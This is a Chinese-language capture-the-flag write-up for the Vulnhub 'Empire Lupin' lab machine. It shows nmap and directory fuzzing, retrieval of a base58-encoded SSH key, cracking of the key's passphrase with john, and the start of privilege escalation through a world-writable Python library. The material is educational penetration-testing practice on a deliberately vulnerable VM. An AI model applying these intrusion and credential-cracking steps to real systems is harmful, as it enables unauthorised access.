Vulnhub Empire Lupin靶机解题过程
Empire Lupin
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:60:18 1 60 PCS Systemtechnik GmbH
192.168.56.109 08:00:27:fc:b8:da 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.109
NMAP扫描
用NMAP工具对目标主机进行全端口扫描:
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.109 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 23:35 EDT
Nmap scan report for bogon (192.168.56.109)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
| 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
MAC Address: 08:00:27:FC:B8:DA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds
从扫描结果可以看到该目标主机开放两个端口22(SSH)以及80(http)
Get Access
目标主机SSH的版本比较高,没有可以利用的漏洞,从http服务着手。
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ curl http://192.168.56.109/
<!DOCTYPE html>
<html>
<head>
<style>
body {
margin: 0;
}
#over img {
margin-left: auto;
margin-right: auto;
display: block;
}
</style>
</head>
<body>
<div id="over" style="position:absolute; width:100%; height:100%">
<img src="/image/arsene_lupin.jpg">
</div>
</body>
</html>
<!-- Its an easy box, dont give up. -->
看一下有无robots.txt文件(其实前面的NMAP扫描结果已经知道存在robots.txt文件,再手动
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ curl http://192.168.56.109/robots.txt
User-agent: *
Disallow: /~myfiles
自然地, 接下来访问一下这个目录/~myfiles
└─$ curl http://192.168.56.109/~myfiles/
<!DOCTYPE html>
<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Error 404</h1>
</body>
</html>
<!-- Your can do it, keep trying. -->
返回结果却是: Error 404,有点奇怪,先放一下,扫描一下有什么目录
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ gobuster dir -u http://192.168.56.109/~myfiles/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.109/~myfiles/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/10/31 23:45:27 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 147]
/.html (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1102080 / 1102805 (99.93%)===============================================================
2022/10/31 23:49:39 Finished
===============================================================
没有任何收获,是不是需要FUZZ?
前面给出提示“ Your can do it, keep trying”, 但是~/myfiles/没有返回结果,而是error,那么第一个方向是看一下这个目录下是不是有子目录,因为提示: keep trying
第二个方向是~myfiles/, FUZZ myfiles,但是需要前面加上~符号,因为不加符号的情况下没有扫描出有价值的目录
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt 'http://192.168.56.109/~FUZZ'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.109/~FUZZ
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000007: 404 9 L 31 W 276 Ch "16"
000000001: 404 9 L 31 W 276 Ch "1"
000000003: 404 9 L 31 W 276 Ch "12"
000000002: 404 9 L 31 W 276 Ch "11"
000000010: 404 9 L 31 W 276 Ch "21"
000000008: 404 9 L 31 W 276 Ch "17"
000000006: 404 9 L 31 W 276 Ch "15"
000000004: 404 9 L 31 W 276 Ch "13"
先不加过滤参数跑一下,发现有很多404 的response,然后加上过滤参数--hc
(备注:用这个字典也是可以跑出来的:/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt)
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 'http://192.168.56.109/~FUZZ'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.109/~FUZZ
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005057: 301 9 L 28 W 318 Ch "secret"
发现了~secret目录
─(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ curl http://192.168.56.109/~secret/
<br>Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,</>
<br>Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.</>
<br>I'm smart I know that.</>
<br>Any problem let me know</>
<h4>Your best friend icex64</>
这里有表明以下含义:
第一:用户名icex64
第二:私钥文件藏在某处,按照同样的习惯,应该是放在/~secret/目录下,但是需要FUZZ出文件名,文件名应该是.开头,因为作者提到了hide
─(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ffuf -u 'http://192.168.56.109/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .pub,.txt,.html,.bak -mc 200 -c -ic
mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 2ms]
─$ wget http://192.168.56.109/~secret/.mysecret.txt
--2022-11-01 00:42:05-- http://192.168.56.109/~secret/.mysecret.txt
Connecting to 192.168.56.109:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4689 (4.6K) [text/plain]
Saving to: ‘.mysecret.txt’
.mysecret.txt 100%[========================================>] 4.58K --.-KB/s in 0s
2022-11-01 00:42:05 (104 MB/s) - ‘.mysecret.txt’ saved [4689/4689]
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ls
nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ls -alh
total 20K
drwxr-xr-x 2 kali kali 4.0K Nov 1 00:42 .
drwxr-xr-x 5 kali kali 4.0K Oct 31 23:20 ..
-rw-r--r-- 1 kali kali 4.6K Oct 4 2021 .mysecret.txt
-rw-r--r-- 1 root root 1.1K Oct 31 23:35 nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ cat .mysecret.txt
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
似乎是base编码,但最后没有=号,用cyberchef尝试不同的base64编码
成功用base58解码,得到私钥文件
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ cat .mysecret.txt
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
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ssh icex64@192.168.56.109
The authenticity of host '192.168.56.109 (192.168.56.109)' can't be established.
ED25519 key fingerprint is SHA256:GZOCytQu/pnSRRTMvJLagwz7ZPlJMDiyabwLvxTrKME.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.109' (ED25519) to the list of known hosts.
icex64@192.168.56.109's password:
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
前面提示可以用fastcrack字典破解
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ john --wordlist=/usr/share/wordlists/fasttrack.txt hashes
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd! (id_rsa)
1g 0:00:00:03 DONE (2022-11-01 00:48) 0.2762g/s 13.25p/s 13.25c/s 13.25C/s Winter2015..Welcome1212
Use the "--show" option to display all of the cracked passwords reliably
得到密码为: P@55w0rd!
──(kali㉿kali)-[~/Vulnhub/Empire_Lupin]
└─$ ssh -i id_rsa icex64@192.168.56.109
Enter passphrase for key 'id_rsa':
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Thu Oct 7 05:41:43 2021 from 192.168.26.4
icex64@LupinOne:~$ id
uid=1001(icex64) gid=1001(icex64) groups=1001(icex64)
icex64@LupinOne:~$
提权
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
这里提到可以不用密码执行heist.py
icex64@LupinOne:/home$ cd arsene/
icex64@LupinOne:/home/arsene$ ls -alh
total 40K
drwxr-xr-x 3 arsene arsene 4.0K Oct 4 2021 .
drwxr-xr-x 4 root root 4.0K Oct 4 2021 ..
-rw------- 1 arsene arsene 47 Oct 4 2021 .bash_history
-rw-r--r-- 1 arsene arsene 220 Oct 4 2021 .bash_logout
-rw-r--r-- 1 arsene arsene 3.5K Oct 4 2021 .bashrc
-rw-r--r-- 1 arsene arsene 118 Oct 4 2021 heist.py
drwxr-xr-x 3 arsene arsene 4.0K Oct 4 2021 .local
-rw-r--r-- 1 arsene arsene 339 Oct 4 2021 note.txt
-rw-r--r-- 1 arsene arsene 807 Oct 4 2021 .profile
-rw------- 1 arsene arsene 67 Oct 4 2021 .secret
icex64@LupinOne:/home/arsene$ cat note.txt
Hi my friend Icex64,
Can you please help check if my code is secure to run, I need to use for my next heist.
I dont want to anyone else get inside it, because it can compromise my account and find my secret file.
Only you have access to my program, because I know that your account is secure.
See you on the other side.
Arsene Lupin.
icex64@LupinOne:/home/arsene$ cat heist.py
import webbrowser
print ("Its not yet ready to get in action")
webbrowser.open("https://empirecybersecurity.co.mz")
icex64@LupinOne:/home/arsene$
icex64用户对heist.py只有读的权限,没有写的权限,但是可以看到这个python脚本调用了webbrowser模块
icex64@LupinOne:/home/arsene$ ls -alh /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24K Oct 4 2021 /usr/lib/python3.9/webbrowser.py
这个文件的权限是777,因此icex也可以对该文件进行修改
